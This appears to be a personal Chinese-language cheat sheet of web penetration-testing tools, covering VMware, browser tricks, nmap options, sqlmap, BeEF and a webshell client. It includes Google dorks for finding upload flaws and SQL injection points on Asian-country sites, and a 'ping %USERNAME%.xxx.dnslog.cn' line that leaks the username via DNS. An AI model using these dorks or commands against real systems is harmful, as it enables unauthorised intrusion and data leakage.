Web渗透工具
Web渗透工具
一、VMware
1 网络
编辑——虚拟网络编辑器。(每一个名称相当于一台交换机)
VMware网络模式:
- 桥接模式:和物理机并列,相当于在物理网中真的加入了一台主机。
- 仅主机模式:类似NAT模式,但是默认不连接外界。
- NAT模式:流量通过物理机走向外界。
2 本地
虚拟机[右键]——快照——拍摄快照:备份。
虚拟机[右键]——快照——快到管理器:恢复虚拟机状态。
虚拟机[右键]——管理——克隆
文件——导出为OVF:导出
3 安装
Win10:
二、浏览器工具
1 分类
The Searchable Subject Index:
- 索引式搜索,只搜索站点的 Title 和 Meta 信息,无法搜索个人主页。(例:Yahoo)
The Full-Text Search Engine:
- 完全内容搜索引擎,通过 Spider 搜索全面的信息。(例:Google)
2 Edge
命令:
在url前加 read: 会进入阅读模式。
edge://surf:摸鱼。
其他命令同谷歌一样,Edge的内核是谷歌浏览器。
扩展:
- 扩展商店:
- 广告拦截:adguard 广告拦截器
- 允许复制:Simple Allow Copy(已失效)
- 下载视频:aix智能下载器
- VPN:Magic VPN || BestGo VPN(可 ChatGPT)
- wappalyzer:查看网站框架、服务器等信息
- Google Shop:
- chatgpt for google
- WebChatGPT(好像没用)
3 Google Chrome
3.1 配置
不安全链接:在当前页面用键盘输入
thisisunsafe
,不是在地址栏输入,就直接敲键盘就行了,页面即会自动刷新进入网页。
3.2 常用命令(Edge也可用)
# 限制搜索结果为指定位置包含了所有 word 的网址(anchor,正文,标题,url中) |
3.3 不常用但有用
# ---------个人信息---------- |
3.4 不推荐使用
# 限定时间段,格式是天文学的儒略日,会返回莫名其妙的东西 |
3.5 高级用法
连接符(默认多个关键词之间默认 AND):
or
:snowblower OR snowmobile 或者 snowblower ( snowmobile OR “Green Bay” )(OR 也可以用 | 代替)-
:不包括关键字,如:snowblower -“Green Bay”+
:强制查询被 Google 忽略的常用字"" / 《》
:精确搜索,防止自动分词特征码定位:
- 例:Photoshop CS4任务信息——详细信息:”文件创建成功,开始下载数据……”等。可以在浏览器中直接搜索 “Photoshop CS4 文件创建成功,开始下载数据……”
其他功能:
手气不错:得到 Google 认为最符合你搜索结果的页面,例如:输入
president
会跳转到www.whitehouse.gov
多数浏览器大小写敏感,但Google不区分。
漏洞利用:
- 查看服务器使用的程序:
site:xx.com typefile:asp / php / jsp
- 上传漏洞:
site:xx.com inurl:file / load
- 注射点:
site:tw / jp / ko inurl:asp?id=
(台湾 / 日本 / 韩国)index of <suffix>
:获取网站数据(suffix:mp3,admin,jpg,pdf,doc,game,download,password, ...
)关键字:
最重要的记住页面一些关键的字,具有一定的特性的。比如:[转到父目录]
这几个字虽然很普通但是不要忘了一般有遍历目录漏洞的站点都有如下漏洞:
bbs/data/+转到父目录
data/+转到父目录
/+转到父目录
转到父目录rmvb
inurl:/diy.asp
3.6 案例
# 搜索C++ vector但去掉csdn加上博客园 |
4 Firefox
配置:
- 不安全链接:about:config——security.enterprise_roots.enabled = true
- 禁用JS:about:config——javascript.enabled = false
插件:
- SwitchyOmega:代理软件
- hackbar:网盘安装。
burp suite证书:
- 下载证书:http://burp
- 选项——高级——证书——导入证书
5 暗黑搜索引擎
集成工具(集成下列搜索引擎):
- 集成FOFA和360Quake:official::Finger (github.com)
- 集成下列四个(效果一般):official::Glass (github.com)
5.1 FOFA
5.2 360Quake
5.3 shodan
5.4 Zoomeye
6 其他
6.1 github
in:name test # 仓库标题搜索含有关键字 |
三、数据包工具
四、集成工具
1 Metaspolit(KaliLinux)
五、信息收集
1 信息工具
maltego(text::Kali Linux):被动信息收集一键版
sn0int(text::Kali Linux):被动信息收集工具集
AWVS:Web扫描:
带参启动路径(管理员身份启动,不然可能无法添加目标):
"C:\Program Files (x86)\Acunetix\13.0.200205121\proto.exe" awvs://launch/
Target——Add Target:创建新URL。
Target——点击URL——设置扫描强度和速度——扫描:
扫描类型
报告生成方式
漏洞日程
X-ray:Web扫描
Nessus:主机扫描
2 Nmap(KaliLinux)
主要功能:主机存活检测、端口探测、服务识别、操作系统识别。
Q1:无结果显示后就新建一个扫描。
2.1 扫描方式
参数 | 作用 |
---|---|
-sS / sT / sA / sW / sM | TCP SYN扫描(半开扫描,默认扫描方式)、TCP connect()扫描、ACK扫描、TCP窗口扫描、TCP Maimon扫描 |
-sU | UDP扫描 |
-sN / sF / sX | TCP Null扫描、FIN扫描、Xmas扫描 |
—scanflags | 自定义TCP包中的 flags |
-sI zombie host[ : probeport ] | 通过指定的僵尸主机发送扫描数据包 |
-sY / sZ | SCTP INIT扫描和COOKIE-ECHO扫描 |
-sO | 使用IP扫描确定目标机支持的协议类型 |
-b “FTP relay host” | 使用FTP bounce扫描 |
2.2 主机存活发现
参数 | 作用 |
---|---|
-sL | 仅仅显示扫描的IP地址数目,不会进行任何扫描 |
-sn | ping 扫描,即主机发现 |
-Pn | 不检测主机存活 |
-PS / PA / PU / PY[ portlist ] | 使用TCP SYN ping、TCP ACK ping、UDP ping发现主机 |
-PE / PP / PM | 使用ICMP信息请求、时间戳请求、地址掩码请求包发现主机 |
-PO[ protocol list ] | 使用IP协议包探测对方主机是否开启 |
-n / -R | 不对IP地址进行域名反向解析、对所有IP地址都进行域名的反向解析 |
2.3 主机端口发现
参数 | 作用 |
---|---|
-p | 指定端口或端口范围。(-p 80 / -p 1-65535) |
-p U : PORT | 扫描UDP的某个端口。(-p U:53) |
-F | 快速扫描模式,比默认扫描的端口少 |
-r | 不随机扫描端口,默认是随机扫描 |
-top-ports “number” | 扫描开放概率最高的 number 个端口。开放概率参考 nmap-services文件,Ubuntu中在/usr/share/nmap.nmap中,默认扫描前1000个 |
2.4 服务版本识别
参数 | 作用 |
---|---|
-sV | 开放版本检测,可以同时使用-A 进行操作系统检测和版本检测 |
—version-intensity “level” | 设置版本扫描强度,level指定使用哪些检测报文,越高服务越可能被正确识别,默认7 |
—version-light | 轻量模式,为—version-intensity 2 别名。 |
—version-all | 所有检测,为—version-intensity 9 别名 |
—version-trace | 显示详细的版本检测过程信息 |
2.5 操作系统识别
所有操作系统信息存在nmap-os-db中
参数 | 作用 |
---|---|
-O | 操作系统检测,可以同时使用-A 进行操作系统检测和版本检测 |
—osscan-limit | 针对指定的目标进行操作系统检测(至少需确知该主机分别有一个 open 和 closed 端口) |
—osscan-guess | 推测操作系统检测结果。Nmap无法确定时会尽可能提供最相近匹配,这是默认匹配模式 |
2.6 输出结果
参数 | 作用 |
---|---|
-oN | 将标准输出直接写入指定的文件 |
-oX | 输出XML文件 |
-oS | 输出全大写 |
-oG | 输出便于通过bash或Perl处理的格式,而非XML文件 |
-oA BASENAME | 将扫描结果以标准格式、XML格式和Grep格式一次性输出 |
-v | 提高输出的详细度 |
-d level | 设置 debug 级别,最高是 9 |
—reason | 显示端口处于特定状态的原因 |
—open | 只输出端口状态为open的端口 |
—packet-trace | 显示所有发送或者接收到的数据包 |
—iflist | 显示路由信息和端口 |
—log-errors | 输出日志等级为 errors 和 warnings 的日志 |
—append-output | 追加到指定文件后 |
—resume FILENAME | 恢复已停止的扫描 |
—stylesheet PAHT / URL | 将 XML 输出转化为 HTML 和 XSL 样式表 |
—Webxml | 从nmap.org得到 XML 的样式 |
—-no-stylesheet | 忽略 XML 声明的 XSL 样式表 |
--scrpit <script> |
使用脚本检测(nmap自带脚本库) |
六、漏洞利用
1 漏洞工具
Sqlmap(text::Kali Linux):SQL注入
Gopher(text::Kali Linux):SSRF利用
Jeboss(text::Kali Linux):web-console,jmx-console,JMXInvokerServlet
BeEf(text::Kali Linux):XSS攻击
七、Webshell
1 蚁剑
Q1:返回数据为空
A1:编码器和解码器都选base64
八、目录工具
1 简单工具
subdomainsbrute:子域名爆破
dirb(text::Kali Linux):目录扫描
dirsearch(text::Kali Linux):目录扫描
御剑后台扫描:目录扫描
Tkbscan:Web路径探测
7kbscan-webpathbrute:Web路径探测
- 7kbscan下载路径
- 使用时除了勾选200还勾选上3XX和5XX。虽然无法确切判断文件是否一定存在,但是可以判断该文件可能存在,之后再做后续判断。
九、内网渗透
DNSLog Platform:测试自己访问外网的,比如
ping %USERNAME%.xxx.dnslog.cn
,可以获得自己的用户信息
1 wafw00f
official::下载wafw00f(github.com)
返回失败的原因:
- 无法访问网站
- 网站未安装WAF
- 网站安装了无法识别的WAF
# 首次使用需要安装 |
十、编程语言
十一、测试网站
ping网站:https://ping.chinaz.com/
测试网站:Altoro Mutual (testfire.net)
本地搭建:DWVA——配置文件改后缀——改密码和数据库一样(root/root):